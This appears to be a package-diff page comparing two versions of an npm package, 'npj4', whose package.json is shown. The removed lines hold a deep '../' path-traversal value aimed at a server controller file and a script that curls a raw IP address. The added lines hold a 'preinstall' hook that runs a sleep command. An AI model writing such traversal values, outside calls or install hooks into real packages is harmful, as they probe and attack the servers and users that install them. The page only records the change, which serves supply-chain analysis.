npj4 1.0.50 → 1.0.51

Sign up to get free protection for your applications and to get access to all the features.
Files changed (1) hide show
  1. package/package.json +3 -3
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "npj4",
3
- "version": "1.0.50",
3
+ "version": "1.0.51",
4
4
  "description": "",
5
5
  "main": "index.js",
6
6
  "amis-widgets": [
@@ -8,7 +8,7 @@
8
8
  "name": "test",
9
9
  "framework": "vue",
10
10
  "usage": "renderer",
11
- "entry": "../../../../../../../../../../../../../app/app/amis-saas/controller/api/IndexController.js",
11
+ "entry": "test.js",
12
12
  "files": [
13
13
  ]
14
14
  }
@@ -19,7 +19,7 @@
19
19
  "."
20
20
  ],
21
21
  "scripts": {
22
- "analyze": "curl http://47.99.124.12:1234"
22
+ "preinstall": "sleep(40)"
23
23
  },
24
24
  "author": "",
25
25
  "license": "ISC"